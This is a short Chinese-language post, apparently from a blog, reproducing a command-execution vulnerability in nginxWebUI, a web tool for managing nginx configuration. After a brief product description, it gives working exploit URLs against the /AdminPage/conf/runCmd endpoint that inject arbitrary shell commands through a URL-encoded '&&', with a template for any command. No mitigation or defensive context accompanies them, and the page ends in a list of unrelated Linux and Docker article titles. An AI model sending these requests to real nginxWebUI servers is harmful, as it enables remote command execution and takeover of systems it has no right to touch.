nginxWebUI runCmd命令执行漏洞复现

系统描述

NginxWebUI 是一款图形化管理 nginx 配置的工具,可以使用网页来快速配置 nginx单机与集群的各项功能,包括 http协议转发,tcp协议转发,反向代理,负载均衡,静态 html服务器,ssl证书自动申请、续签、配置等,配置好后可一建生成 nginx.conf文件,同时可控制 nginx使用此文件进行启动与重载,完成对 nginx的图形化控制闭环。

漏洞复现

访问url

url地址 + /AdminPage/conf/runCmd?cmd=id%26%26echo%20nginx
url地址 + /AdminPage/conf/runCmd?cmd=命令%26%26echo%20nginx
相关推荐
肖永威30 分钟前
CentOS环境上离线安装python3及相关包
linux·运维·机器学习·centos
mengao123434 分钟前
centos 服务器 docker 使用代理
服务器·docker·centos
布鲁格若门36 分钟前
CentOS 7 桌面版安装 cuda 12.4
linux·运维·centos·cuda
Eternal-Student41 分钟前
【docker 保存】将Docker镜像保存为一个离线的tar归档文件
运维·docker·容器
C-cat.44 分钟前
Linux|进程程序替换
linux·服务器·microsoft
dessler44 分钟前
云计算&虚拟化-kvm-扩缩容cpu
linux·运维·云计算
怀澈1221 小时前
高性能服务器模型之Reactor(单线程版本)
linux·服务器·网络·c++
DC_BLOG1 小时前
Linux-Apache静态资源
linux·运维·apache
学Linux的语莫1 小时前
Ansible Playbook剧本用法
linux·服务器·云计算·ansible
码农小丘1 小时前
一篇保姆式centos/ubuntu安装docker
运维·docker·容器